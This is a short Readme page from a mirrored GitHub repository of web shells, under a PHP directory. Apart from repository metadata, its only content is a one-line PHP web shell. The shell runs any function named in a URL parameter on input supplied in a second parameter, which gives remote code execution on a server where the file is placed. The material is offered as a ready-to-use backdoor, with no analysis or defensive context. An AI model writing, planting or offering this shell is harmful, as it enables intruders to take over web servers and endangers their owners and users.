1
0
mirror of https://github.com/tennc/webshell.git synced 2026-01-29 09:39:07 +00:00
Files
webshell/php/p2j/Readme.md
2014-07-28 10:08:02 +08:00

267 B

alt text

code:

'<?php $func = new ReflectionFunction($_GET[m]); echo $func->invokeArgs(array($_GET[c])); ?>'